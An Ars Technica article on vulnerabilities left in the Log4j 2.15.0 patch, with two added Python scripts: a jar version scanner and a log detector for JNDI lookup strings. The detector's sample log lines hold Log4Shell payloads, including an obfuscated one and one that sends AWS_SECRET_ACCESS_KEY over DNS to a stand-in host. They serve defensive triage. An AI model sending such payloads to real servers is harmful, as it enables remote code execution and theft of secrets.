https://arstechnica.com/information-technology/2021/12/patch-fixing-critical-log4j-0-day-has-its-own-vulnerability-thats...
Patching the patch — Patch fixing critical Log4j 0-day has its own vulnerability that's under exploit
If you've patched using Log4j 2.15.0, it's time to consider updating again. Stat.
Dan Goodin - 12/16/2021, 5:40 AM
[Image credit: Wikimedia Commons/Alex E. Proimos]

Last Thursday, the world learned of an in-the-wild exploitation of a critical code-execution zero-day in Log4j, a logging utility used by just about every cloud service and enterprise network on the planet. Open source developers quickly released an update that patched the flaw and urged all users to install it immediately.

Further reading: Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet

Now, researchers are reporting that there are at least two vulnerabilities in the patch, released as Log4j 2.15.0, and that attackers are actively exploiting one or both of them against real-world targets who have already applied the update.
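Before deciding whether that warning applies to you, you need to know which log4j-core builds are actually deployed, including copies bundled inside WAR and EAR files, because the article's distinction is between the original flaw, the incomplete 2.15.0 fix, and the 2.16.0 release it goes on to recommend. The Python script below is an added example written for this page, not code from Ars Technica or the Apache Log4j project. It reads the version from the Maven pom.properties that official log4j-core artifacts carry, checks whether JndiLookup.class is present, and classifies each archive against those versions as they stood in December 2021. The "mitigated" state for a 2.15.0 jar with JndiLookup.class deleted comes from the stopgap Apache's own advisory documented, not from this article. The demo archives it writes to a temporary directory are constructed stand-ins, not real artifacts.

```python
"""Triage log4j-core archives on disk against the versions in this article.

Added example, not code from Ars Technica or the Apache Log4j project.
Walks a directory, opens every .jar/.war/.ear as a zip (recursing into
archives nested inside them), reads the log4j-core version from the Maven
pom.properties the official artifacts ship, and notes whether
JndiLookup.class is present. build_demo_tree() writes constructed stand-ins.
"""
import io
import os
import re
import sys
import tempfile
import zipfile
from typing import Dict, Iterator, List, Optional, Tuple

POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear")
Version = Optional[Tuple[int, int, int]]


def parse_version(pom_properties: str) -> Version:
    """Pull major.minor.patch out of a pom.properties body."""
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", pom_properties, re.MULTILINE)
    return (int(m[1]), int(m[2]), int(m[3])) if m else None


def classify(version: Version, has_jndi_lookup: bool) -> str:
    """Map a log4j-core version to the state the article describes (December 2021)."""
    if version is None:
        return "UNKNOWN VERSION: log4j-core classes found but no pom.properties; inspect by hand"
    if version < (2, 15, 0):
        return "VULNERABLE: CVE-2021-44228 (original 0-day); upgrade to 2.16.0"
    if version < (2, 16, 0):
        if has_jndi_lookup:
            return "VULNERABLE: CVE-2021-45046 (2.15.0 fix incomplete); upgrade to 2.16.0"
        # Apache's advisory documents deleting JndiLookup.class as a stopgap
        return "MITIGATED: 2.15.0 with JndiLookup.class removed; still upgrade to 2.16.0"
    return "OK: 2.16.0 or later (message lookups removed, JNDI off by default)"


def inspect_archive(zf: zipfile.ZipFile, path: str) -> Iterator[dict]:
    """Yield a finding if this archive is log4j-core, then recurse into nested archives."""
    names = set(zf.namelist())
    if POM in names or JNDI_LOOKUP in names:
        version = parse_version(zf.read(POM).decode("utf-8", "replace")) if POM in names else None
        has_jndi = JNDI_LOOKUP in names
        yield {"path": path, "version": version, "jndi_lookup_present": has_jndi,
               "status": classify(version, has_jndi)}
    for name in sorted(names):  # WEB-INF/lib, fat jars, EARs carrying WARs ...
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    yield from inspect_archive(inner, f"{path}!/{name}")
            except zipfile.BadZipFile:
                continue


def scan_tree(root: str) -> List[dict]:
    """Findings for every archive under root, including nested ones."""
    findings: List[dict] = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(ARCHIVE_EXT):
                continue
            full = os.path.join(dirpath, fname)
            try:
                with zipfile.ZipFile(full) as zf:
                    findings.extend(inspect_archive(zf, full))
            except zipfile.BadZipFile:
                findings.append({"path": full, "version": None, "jndi_lookup_present": None,
                                 "status": "NOT A ZIP ARCHIVE"})
    return findings


def summarize(root: str) -> Dict[str, str]:
    """Archive file name -> status, for a quick read of scan_tree()."""
    return {os.path.basename(f["path"]): f["status"] for f in scan_tree(root)}


def demo_jar_bytes(version: str, include_jndi_lookup: bool = True) -> bytes:
    """A constructed stand-in for log4j-core-<version>.jar (not a real artifact)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM, f"#Generated by Maven\nversion={version}\n"
                         "groupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only
    return buf.getvalue()


def build_demo_tree() -> str:
    """Write three constructed deployments to a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="log4j-triage-")
    with open(os.path.join(root, "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(demo_jar_bytes("2.14.1"))
    with open(os.path.join(root, "log4j-core-2.16.0.jar"), "wb") as f:
        f.write(demo_jar_bytes("2.16.0"))  # 2.16.0 still ships the class; JNDI is just off
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.15.0.jar", demo_jar_bytes("2.15.0"))
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_demo_tree()
    for finding in scan_tree(target):
        print(f"{finding['status']:<70} {finding['path']}")
```

Run it with a directory argument to scan a real deployment; with no argument it scans the constructed demo tree. Shaded or relocated builds that drop pom.properties are only caught by the JndiLookup.class check, so treat an "UNKNOWN VERSION" result as something to open by hand, and note that 2.16.0 still ships JndiLookup.class with JNDI turned off by default, which is why the presence of the class alone says nothing about a 2.16.0 jar.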
The researchers are urging organizations to install a new patch, released as version 2.16.0, as soon as possible to fix the vulnerability, which is tracked as CVE-2021-45046. The earlier fix, researchers said late Tuesday, "was incomplete in certain non-default configurations" and made it possible for attackers to perform denial-of-service attacks, which can take a vulnerable service completely offline until the victim restarts it or takes other action. The non-default configurations Apache's notice describes are ones in which a custom pattern layout pulls attacker-controlled Thread Context Map (MDC) data into the log line, either through a context lookup such as $${ctx:loginId} or through a %X, %mdc, or %MDC pattern; if your layouts do neither, the 2.15.0 gap is narrower, but the upgrade advice is unchanged. Version 2.16.0 "fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default," according to the Apache vulnerability notice for CVE-2021-45046.

On Wednesday, researchers at security firm Praetorian said there's an even more serious vulnerability in 2.15.0: an information-disclosure flaw that can be used to exfiltrate data from affected servers. "In our research, we have demonstrated that 2.15.0 can still allow for exfiltration of sensitive data in certain circumstances," Praetorian researcher Nathan Sportsman wrote. "We have passed technical details of the issue to the Apache Foundation, but in the interim, we strongly recommend that customers upgrade to 2.16.0 as quickly as possible." The researchers released a video showing their proof-of-concept exploit in action.

[Video: Log4j 2.15.0 still allows for exfiltration of sensitive data.]

Researchers for content delivery network Cloudflare, meanwhile, said on Wednesday that CVE-2021-45046 is now under active exploitation. The company urged people to update to version 2.16.0 as soon as possible. The Cloudflare post didn't say if attackers are using the vulnerability only to perform DoS attacks or if they are also exploiting it to steal data. Researchers from Cloudflare weren't immediately available to clarify. Praetorian researchers also weren't immediately available to say if they're aware of in-the-wild attacks exploiting the data-exfiltration flaw.
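Cloudflare's observation that CVE-2021-45046 is being exploited raises the obvious question of what the attempts look like in your own logs. The lookup syntax an attacker plants in a request header, form field, or username is the same ${...} syntax that Log4j's message lookups evaluate, and it is routinely obfuscated with nested lookups so that the literal string "jndi" never appears in the raw request. The following Python is an added example written for this page, not code from Ars Technica, Cloudflare, or the Log4j project. It folds the common obfuscation lookups (lower, upper, and the ":-" default-value form) before matching, reports the JNDI URL scheme, and flags env, sys, or ctx lookups nested inside the JNDI URL, which is the shape used to push server-side values out in the DNS or LDAP request. The access-log lines it scans are constructed samples using documentation address ranges.

```python
"""Flag Log4j lookup strings in untrusted input.

Added example, not code from Ars Technica, Cloudflare or the Log4j project.
Each line is treated as text a Log4j 2.x application might log. Common
obfuscation lookups are folded first so split-up spellings of "jndi" are
still caught. SAMPLE_LINES are constructed, not real traffic.
"""
import re
from typing import List, Optional, Tuple

# The innermost ${...} group: no further '${' or '}' inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup and the URL scheme that follows it, e.g. ${jndi:ldap://...
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)
# Lookups that read server-side state; nested inside a JNDI URL they exfiltrate it.
NESTED = re.compile(r"\$\{\s*(env|sys|ctx|java|main|bundle|date|log4j)\s*:[^}]*\}", re.IGNORECASE)


def _fold(body: str) -> Optional[str]:
    """Evaluate the obfuscation lookups attackers use to hide 'jndi'.

    Returns the text Log4j would substitute, or None if this lookup is not
    one we fold (it is then left in place for the JNDI check).
    """
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    # ${::-j} and ${sys:nope:-j} both resolve to the default after ':-'
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalize(text: str, max_rounds: int = 20) -> str:
    """Collapse nested obfuscation lookups, innermost first, to a fixed point."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            folded = _fold(m.group(1))
            if folded is None:
                return m.group(0)
            changed = True
            return folded

        text = INNER.sub(repl, text)
        if not changed:
            break
    return text


def scan(line: str) -> Optional[dict]:
    """Return a finding for a line carrying a JNDI lookup, else None."""
    norm = normalize(line)
    m = JNDI.search(norm)
    if not m:
        return None
    tail = norm[m.start():]  # the JNDI lookup and everything nested after it
    leaks = sorted({n.group(1).lower() for n in NESTED.finditer(tail)})
    return {
        "scheme": m.group(1).lower(),
        "obfuscated": norm != line,
        "nested_lookups": leaks,
        "normalized": norm,
    }


def triage(lines: List[str]) -> List[Tuple[int, dict]]:
    """(line index, finding) for every line that carries a JNDI lookup."""
    out = []
    for i, line in enumerate(lines):
        finding = scan(line)
        if finding:
            out.append((i, finding))
    return out


SAMPLE_LINES = [  # constructed access-log lines; addresses are documentation ranges
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "User-Agent: curl/7.79"',
    '203.0.113.7 - - "GET / HTTP/1.1" 200 "User-Agent: ${jndi:ldap://198.51.100.9:1389/a}"',
    '203.0.113.8 - - "GET / HTTP/1.1" 200 "X-Api-Version: ${${lower:j}${upper:n}${::-d}i:rmi://198.51.100.9/x}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "User-Agent: ${jndi:dns://${env:AWS_SECRET_ACCESS_KEY}.198.51.100.9}"',
]

if __name__ == "__main__":
    for i, f in triage(SAMPLE_LINES):
        print(f"line {i}: scheme={f['scheme']} obfuscated={f['obfuscated']} nested={f['nested_lookups']}")
```

Pattern matching like this is a triage signal, not a control: attackers vary the nesting, and Log4j resolves far more lookups than the three folded here, so a hit tells you someone is probing and a miss tells you nothing. It complements the upgrade to 2.16.0 rather than replacing it.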
They also didn’t provide additional details about the vulnerability because they didn’t want to provide information that would make it easier for hackers to exploit it. PROMOTED COMMENTS * Marlor_AU Ars Tribunus Angusticlavius et Subscriptor jump to post Given that most people using Log4J don't use any of the fancy features that are causing vulnerabilities, I think there's a real case for a simple, well-audited drop-in replacement that just implements the core API methods for lightweight users. Most users probably just set up a basic logger with simple properties, instantiate it in their classes, and just log plain messages using "log.info", log.debug", etc. A "LightLog4J" implementation would act as a drop-in replacement for many users, and would probably only require minor revisions for many others. It could even just be a wrapper around another well-proven, lightweight logging library. 6234 posts | registered 10/4/2003 READER COMMENTS 157 with Dan Goodin Dan Goodin is Senior Security Editor at Ars Technica, where he oversees coverage of malware, computer espionage, botnets, hardware hacking, encryption, and passwords. In his spare time, he enjoys gardening, cooking, and following the independent music scene. Advertisement CHANNEL ARS TECHNICA UNSOLVED MYSTERIES OF QUANTUM LEAP WITH DONALD P. BELLISARIO Today "Quantum Leap" series creator Donald P. Bellisario joins Ars Technica to answer once and for all the lingering questions we have about his enduringly popular show. Was Dr. Sam Beckett really leaping between all those time periods and people or did he simply imagine it all? What do people in the waiting room do while Sam is in their bodies? What happens to Sam's loyal ally Al? 30 years following the series finale, answers to these mysteries and more await. * UNSOLVED MYSTERIES OF QUANTUM LEAP WITH DONALD P. BELLISARIO * UNSOLVED MYSTERIES OF WARHAMMER 40K WITH AUTHOR DAN ABNETT * SITREP: F-16 REPLACEMENT SEARCH A SIGNAL OF F-35 FAIL? 